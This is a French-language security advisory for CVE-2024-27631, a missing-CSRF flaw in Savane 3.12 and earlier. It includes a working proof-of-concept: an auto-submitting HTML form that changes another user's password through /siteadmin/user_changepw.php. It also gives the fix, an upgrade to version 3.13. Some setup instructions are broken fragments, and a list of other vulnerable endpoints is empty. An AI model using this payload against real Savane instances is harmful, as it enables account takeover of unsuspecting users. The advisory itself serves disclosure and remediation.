
CVE-2024–27631 Reference
Dans Savane v3.12 et versions antérieures, l'absence de protection CSRF sur les fonctions administratives peut permettre une escalade de privilèges et/ou une prise de contrôle de compte. En particulier, le point d'accès /siteadmin/usergroup.php inclut la fonctionnalité permettant de modifier les mots de passe et les indicateurs administratifs d'autres utilisateurs, permettant ainsi à un attaquant de se nommer administrateur.
Les autres points d'accès notables vulnérables à CSRF incluent :
Classification CWE : CWE-352 : Contrefaçon de requête intersite (CSRF)
Signalé par : Ally Petitt
Produit concerné : Savane
Versions concernées : 3.12 et versions antérieures
Ceci est une preuve de concept (PoC) pour changer le mot de passe d'un autre compte utilisateur comme voie de prise de contrôle de compte.
/users/<username>).<savane_instance> par le nom de domaine/adresse hôte approprié.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1!.Notez que ce script PoC a été testé sur Firefox v103.0 (64-bit).
Mettez à niveau vers Savane version 3.13 ou ultérieure. Le correctif se trouve ici.